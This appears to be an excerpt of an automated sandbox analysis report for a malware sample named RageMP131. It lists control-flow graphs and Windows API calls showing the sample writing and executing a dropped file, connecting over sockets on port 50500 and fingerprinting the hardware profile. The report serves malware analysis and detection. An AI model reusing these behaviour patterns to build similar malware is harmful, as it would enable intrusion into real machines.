RtlAllocateHeap ___std_exception_copy __Getctype 23242->23267 23245 352c91 4 API calls 23243->23245 23254 356242 23243->23254 23246 356262 23245->23246 23256 3644ad 23246->23256 23249 363642 RtlAllocateHeap 23250 356276 23249->23250 23260 3620ff 23250->23260 23254->23239 23255->23239 23257 3644c4 23256->23257 23258 35626a 23256->23258 23257->23258 23269 364473 RtlAllocateHeap __dosmaperr 23257->23269 23258->23249 23262 362128 23260->23262 23264 35627d 23260->23264 23261 362177 23274 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23261->23274 23262->23261 23265 36214f 23262->23265 23264->23254 23268 364473 RtlAllocateHeap __dosmaperr 23264->23268 23270 36206e 23265->23270 23267->23254 23268->23254 23269->23258 23271 36207a std::_Locinfo::_Locinfo_ctor 23270->23271 23273 3620b9 23271->23273 23275 3621d2 23271->23275 23273->23264 23274->23264 23276 367d9e RtlAllocateHeap 23275->23276 23278 3621e2 23276->23278 23277 3621e8 23287 367d0d RtlAllocateHeap __dosmaperr 23277->23287 23278->23277 23280 36221a 23278->23280 23281 367d9e RtlAllocateHeap 23278->23281 23280->23277 23282 367d9e RtlAllocateHeap 23280->23282 23284 362211 23281->23284 23283 362226 FindCloseChangeNotification 23282->23283 23283->23277 23285 367d9e RtlAllocateHeap 23284->23285 23285->23280 23286 362240 23286->23273 23287->23286 23291 35a828 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23305 278b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23308 272540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor 23306 28a100 7 API calls 3 library calls

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 821044-821074 GetPEB 1 821077-82109a 0->1 2 82109d-8210a0 1->2 3 8210a6-8210bc 2->3 4 8211ee-82122b CreateFileA 2->4 5 821110-821116 3->5 6 8210be-8210c5 3->6 24 821265-821269 4->24 25 82122d-821230 4->25 8 821118-82111f 5->8 9 821129-82112f 5->9 6->5 10 8210c7-8210ce 6->10 8->9 12 821121-821124 8->12 13 821131-821138 9->13 14 821148-82114e 9->14 10->5 11 8210d0-8210d7 10->11 11->5 15 8210d9-8210dd 11->15 17 8211bb-8211c0 12->17 13->14 18 82113a-821141 13->18 19 821150-821157 14->19 20 821167-82116f 14->20 15->5 21 8210df-8210e3 15->21 27 8211c2-8211c5 17->27 28 8211e0-8211e9 17->28 18->14 26 821143-821146 18->26 19->20 29 821159-821160 19->29 22 821171-821178 20->22 23 821188-82118e 20->23 21->17 31 8210e9-82110b 21->31 22->23 32 82117a-821181 22->32 33 821190-821197 23->33 34 8211a7-8211ad 23->34 35 821232-821238 25->35 26->17 27->28 36 8211c7-8211ca 27->36 28->2 29->20 30 821162-821165 29->30 30->17 31->1 32->23 37 821183-821186 32->37 33->34 38 821199-8211a0 33->38 34->17 39 8211af-8211b6 34->39 40 821246-821252 WriteFile 35->40 41 82123a-821242 35->41 36->28 42 8211cc-8211cf 36->42 37->17 38->34 45 8211a2-8211a5 38->45 39->17 46 8211b8 39->46 48 821255-821262 FindCloseChangeNotification WinExec 40->48 41->35 47 821244 41->47 42->28 43 8211d1-8211d4 42->43 43->28 49 8211d6-8211d9 43->49 45->17 46->17 47->48 48->24 49->28 50 8211db-8211de 49->50 50->4 50->28
                                    APIs
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00821223
                                    • WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00821252
                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00821256
                                    • WinExec.KERNEL32(?,00000005), ref: 00821262
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 2234911746-1035807574
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: 3075cfa525de2dac800afc0fb3ac393af3226dd00b7612f6e2224f353ea8c955
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 46611874D01229DBCF24CF94E888AADF7B4FF64315F2592AAD605AB200C3709ED1CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 28ec20-28ec58 52 28ec5e 51->52 53 28f0bf-28f0d3 51->53 54 28ec64-28ec6c 52->54 55 28ec6e-28ec94 call 28db60 54->55 56 28eca7-28ecf0 setsockopt recv 54->56 58 28ec99-28eca1 55->58 56->53 61 28ecf6-28ecf9 56->61 58->56 60 28f0aa-28f0b9 Sleep 58->60 60->53 60->54 62 28ecff-28ed53 call 2d8330 recv 61->62 63 28f037-28f053 call 284a90 61->63 71 28ed59-28ed74 recv 62->71 72 28efe4-28eff1 62->72 69 28f09c-28f0a4 Sleep 63->69 70 28f055 63->70 69->60 73 28f05f-28f086 call 28e060 70->73 74 28f057-28f05d 70->74 71->72 75 28ed7a-28edb1 71->75 72->69 77 28eff7-28f003 72->77 80 28f08b-28f097 73->80 74->69 74->73 78 28edb3-28ee11 call 2d8330 recv 75->78 79 28ee14-28ee44 call 2d5a60 75->79 81 28f019-28f023 call 34cbd1 77->81 82 28f005-28f013 77->82 78->79 89 28ee4a 79->89 90 28ef64-28efb3 call 28e460 79->90 80->69 81->69 82->81 93 28ee50-28ef5e 89->93 90->72 97 28efb5-28efc4 90->97 93->90 98 28efda-28efe1 call 34cbd1 97->98 99 28efc6-28efd4 97->99 98->72 99->98
                                    APIs
                                    • setsockopt.WS2_32(00000360,0000FFFF,00001006,?,00000008), ref: 0028ECC7
                                    • recv.WS2_32(?,00000004,00000002), ref: 0028ECE1
                                    • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0028ED4E
                                    • recv.WS2_32(00000000,0000000C,00000008), ref: 0028ED6F
                                    • recv.WS2_32(00000000,?,00000008), ref: 0028EE0C
                                      • Part of subcall function 0028DB60: WSAStartup.WS2_32 ref: 0028DB8B
                                      • Part of subcall function 0028DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                      • Part of subcall function 0028DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
                                      • Part of subcall function 0028DB60: closesocket.WS2_32(00000000), ref: 0028DC4D
                                    • recv.WS2_32(?,00000004,00000008), ref: 0028F033
                                    • Sleep.KERNELBASE(00000001), ref: 0028F09E
                                    • Sleep.KERNELBASE(00000064), ref: 0028F0AC
                                    • __Mtx_unlock.LIBCPMT ref: 0028F211
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
                                    • String ID: 0$50500
                                    • API String ID: 2930922264-4033130746
                                    • Opcode ID: 0c346d6ca639684d0c8e97293407d28d26297aaa83a2de93aa61572f0e7c9015
                                    • Instruction ID: dae38a021313e02948ccda1614ed36e9e32149150302c015cec5f4eef4c55fcd
                                    • Opcode Fuzzy Hash: 0c346d6ca639684d0c8e97293407d28d26297aaa83a2de93aa61572f0e7c9015
                                    • Instruction Fuzzy Hash: ACB1DD31D11259CFEB21EFA8CC85BADBBB5FF56310F248219E444AB2D6D770A994CB40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 102 28e060-28e0af call 2d5a60 105 28e1d4-28e20a call 2d58e0 102->105 106 28e0b5-28e0b8 102->106 115 28e238-28e26c call 277d20 105->115 116 28e20c-28e218 105->116 108 28e0c0-28e0e6 106->108 109 28e0f8-28e107 108->109 110 28e0e8-28e0f3 108->110 113 28e109-28e112 109->113 114 28e117-28e123 109->114 112 28e1c7 110->112 117 28e1ca-28e1ce 112->117 113->112 118 28e133-28e13f 114->118 119 28e125-28e12e 114->119 132 28e26e-28e280 115->132 133 28e282-28e28a call 2d8330 115->133 120 28e21a-28e228 116->120 121 28e22e-28e235 call 34cbd1 116->121 117->105 117->108 123 28e14c-28e158 118->123 124 28e141-28e14a 118->124 119->112 120->121 125 28e44b call 351e70 120->125 121->115 128 28e15a-28e163 123->128 129 28e165-28e171 123->129 124->112 135 28e450-28e455 call 351e70 125->135 128->112 136 28e17e-28e18a 129->136 137 28e173-28e17c 129->137 138 28e28f-28e2e2 call 277d20 * 2 132->138 133->138 141 28e18c-28e195 136->141 142 28e197-28e1a3 136->142 137->112 150 28e2e4-28e313 call 277d20 call 34e630 138->150 151 28e316-28e32c call 277d20 138->151 141->112 145 28e1b0-28e1b9 142->145 146 28e1a5-28e1ae 142->146 145->117 147 28e1bb-28e1c3 145->147 146->112 147->112 150->151 157 28e332-28e338 151->157 158 28e3b7 151->158 161 28e340-28e36c 157->161 159 28e3bb-28e3c1 158->159 163 28e3eb-28e403 159->163 164 28e3c3-28e3cf 159->164 162 28e370-28e37b 161->162 162->162 165 28e37d-28e3ab WSASend 162->165 168 28e435-28e44a 163->168 169 28e405-28e411 163->169 166 28e3e1-28e3e8 call 34cbd1 164->166 167 28e3d1-28e3df 164->167 179 28e3ad-28e3b5 165->179 180 28e425-28e429 165->180 166->163 167->135 167->166 170 28e42b-28e432 call 34cbd1 169->170 171 28e413-28e421 169->171 170->168 171->135 173 28e423 171->173 173->170 179->158 179->161 180->159
                                    APIs
                                    • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00374438,00000000,00000000,-003A65B0), ref: 0028E3A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Send
                                    • String ID: 0$131$50500$Ws2_32.dll$\;:$ta:$;:
                                    • API String ID: 121738739-3205092695
                                    • Opcode ID: eb47218c195e89c67ac32702a0bda55344d92cebe4719528535c72a6f4a206a5
                                    • Instruction ID: 0e595f855a3f7fb3b7055cfa4fd251295636b0cd604159c0137491fb835d4b08
                                    • Opcode Fuzzy Hash: eb47218c195e89c67ac32702a0bda55344d92cebe4719528535c72a6f4a206a5
                                    • Instruction Fuzzy Hash: D8D1FF30E14248DFDF14EFA8CC54BADBBF5AF02300F694258D855AB2C2E7709886CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 28db60-28db92 WSAStartup 182 28db98-28dbc2 call 277d20 * 2 181->182 183 28dc66-28dc6f 181->183 188 28dbce-28dc14 182->188 189 28dbc4-28dbc8 182->189 191 28dc60 188->191 192 28dc16-28dc1c 188->192 189->183 189->188 191->183 193 28dc1e 192->193 194 28dc74-28dc7e 192->194 195 28dc24-28dc38 socket 193->195 194->191 198 28dc80-28dc88 194->198 195->191 197 28dc3a-28dc4a connect 195->197 199 28dc4c-28dc54 closesocket 197->199 200 28dc70 197->200 199->195 201 28dc56-28dc5f 199->201 200->194 201->191
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0028DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0028DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0028DC41
                                    • closesocket.WS2_32(00000000), ref: 0028DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500
                                    • API String ID: 3098855095-2230786414
                                    • Opcode ID: 4bb8ef687a670e8f2464cd31eb11b56a61069117ce825d761b3dd24cda41c261
                                    • Instruction ID: ef61f09da8e829b6a1623d3d4e7793ddaf38a30c619bba5d38bbeb1277ec1b77
                                    • Opcode Fuzzy Hash: 4bb8ef687a670e8f2464cd31eb11b56a61069117ce825d761b3dd24cda41c261
                                    • Instruction Fuzzy Hash: 1131E1765153016BC7209F289C89B6BB7E4EFC9734F105F1EF8A8A32D0E37098188792

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 236 4e00763-4e00767 237 4e00769-4e0076d 236->237 238 4e0072c-4e0075e 236->238 240 4e00786-4e0078d GetCurrentHwProfileW 237->240 238->237 242 4e0079b-4e009f5 call 4e009f6 240->242
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f208e1c54c5ae15143d67f81cd2463ccc9d3eb3978539de2b404a9536cc06373
                                    • Instruction ID: bf018efaf00c9c19a35d7799c11adee334b102a6b4d5c94cb5c9e22cf6f01494
                                    • Opcode Fuzzy Hash: f208e1c54c5ae15143d67f81cd2463ccc9d3eb3978539de2b404a9536cc06373
                                    • Instruction Fuzzy Hash: E8417BEB20C121BCF11291823B50FFB176DE7D2730731E46AF817C1586F2891ACA2472

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 203 4e00710-4e0076d 209 4e00786-4e0078d GetCurrentHwProfileW 203->209 210 4e0079b-4e009f5 call 4e009f6 209->210
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c7579e1399a7430022aee5bead54493c9b45a83c6e5384c91452c7862dcf26b5
                                    • Instruction ID: dfc8235d0d213710214b708dd259ee66dd62a4019b9c1fa45fd31dbf7f041328
                                    • Opcode Fuzzy Hash: c7579e1399a7430022aee5bead54493c9b45a83c6e5384c91452c7862dcf26b5
                                    • Instruction Fuzzy Hash: 714149EB20C121BCF12291823B60BFB576DEBD2730731E466F817D5586F3981ACA6572

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 269 4e0072c-4e0076d 274 4e00786-4e0078d GetCurrentHwProfileW 269->274 275 4e0079b-4e009f5 call 4e009f6 274->275
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 0a5481ac2f1891354510cf68845b0d01f65166f796be25a26859caf0a72077a6
                                    • Instruction ID: 857731b8c11430d690c845685172e70134c7513778f05046efc28a6657a9d251
                                    • Opcode Fuzzy Hash: 0a5481ac2f1891354510cf68845b0d01f65166f796be25a26859caf0a72077a6
                                    • Instruction Fuzzy Hash: E5416AEB20C121BCF11291823B50FFB576DE7D2730731D46AF817D5586F2891ACA2472

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 301 4e00741-4e0076d 305 4e00786-4e0078d GetCurrentHwProfileW 301->305 306 4e0079b-4e009f5 call 4e009f6 305->306
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 3319152832eb54c0cf8fa2b7f1d3e972c2ce0817c71cc69907fb9bda70baf09d
                                    • Instruction ID: 88bfd7800d10d71d09615ca4c1e3057a601f94dbc5c091ee6ccb0c6d1f34436f
                                    • Opcode Fuzzy Hash: 3319152832eb54c0cf8fa2b7f1d3e972c2ce0817c71cc69907fb9bda70baf09d
                                    • Instruction Fuzzy Hash: A2414AEB20C121BCF11291823B60BFB576DE6D6730731D46AF817D1586F3991ACA2532

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 332 4e00758-4e0076d 335 4e00786-4e0078d GetCurrentHwProfileW 332->335 336 4e0079b-4e009f5 call 4e009f6 335->336
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c5938bcf0ea8821c13be35621491fd0f0295097c9582476b227c42dbc53ca37d
                                    • Instruction ID: 1c934338a244c345c9870ec04b2c1a6d91969d57826f1e4d61cada278aef2769
                                    • Opcode Fuzzy Hash: c5938bcf0ea8821c13be35621491fd0f0295097c9582476b227c42dbc53ca37d
                                    • Instruction Fuzzy Hash: 794149EB20C121BCF12291823B60BFB57AEE7D6730731D467F917D1586F3881A8A2572

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 362 4e00773-4e0078d GetCurrentHwProfileW 364 4e0079b-4e009f5 call 4e009f6 362->364
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32 ref: 04E00788
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3744602196.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_4e00000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: cbe437e3b7103544df602a0a3ddea4f4fb8f17a795e1b743d7a3a3c162ff3531
                                    • Instruction ID: ba1c48bba57276e1eea6549ad47ca5ca00f6b99a1462b655b5ff4f4264561776
                                    • Opcode Fuzzy Hash: cbe437e3b7103544df602a0a3ddea4f4fb8f17a795e1b743d7a3a3c162ff3531
                                    • Instruction Fuzzy Hash: E6415DEB60C1207CF12281823B60BFB67ADE7D2730731D867F917D5586F3895A8A2572

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 390 362b5c-362b7e 391 362b84-362b86 390->391 392 362d71 390->392 394 362bb2-362bd5 391->394 395 362b88-362ba7 call 351de3 391->395 393 362d73-362d77 392->393 397 362bd7-362bd9 394->397 398 362bdb-362be1 394->398 403 362baa-362bad 395->403 397->398 400 362be3-362bf4 397->400 398->395 398->400 401 362bf6-362c04 call 35b83d 400->401 402 362c07-362c17 call 3626a1 400->402 401->402 408 362c60-362c72 402->408 409 362c19-362c1f 402->409 403->393 410 362c74-362c7a 408->410 411 362cc9-362ce9 WriteFile 408->411 412 362c21-362c24 409->412 413 362c48-362c5e call 362272 409->413 414 362cb5-362cc7 call 36271e 410->414 415 362c7c-362c7f 410->415 418 362cf4 411->418 419 362ceb-362cf1 411->419 416 362c26-362c29 412->416 417 362c2f-362c3e call 362639 412->417 429 362c41-362c43 413->429 441 362c9c-362c9f 414->441 422 362ca1-362cb3 call 3628e2 415->422 423 362c81-362c84 415->423 416->417 424 362d09-362d0c 416->424 417->429 421 362cf7-362d02 418->421 419->418 430 362d04-362d07 421->430 431 362d6c-362d6f 421->431 422->441 432 362d0f-362d11 423->432 433 362c8a-362c97 call 3627f9 423->433 424->432 429->421 430->424 431->393 438 362d13-362d18 432->438 439 362d3f-362d4b 432->439 433->441 442 362d31-362d3a call 35a8c8 438->442 443 362d1a-362d2c 438->443 444 362d55-362d67 439->444 445 362d4d-362d53 439->445 441->429 442->403 443->403 444->403 445->392 445->444
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00356747,?,00000000,00000000,00000000,?,00000000,?,0034BC71,00356747,00000000,0034BC71,?,?), ref: 00362CE1
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 663b507beda2cffe576a5847f60736a7b0a06665e6ec4ab492f33c555f2625a8
                                    • Instruction ID: 168f5c2468d38f47695967a601d803875cdae1cf842ff16a8ddb15703bb4f753
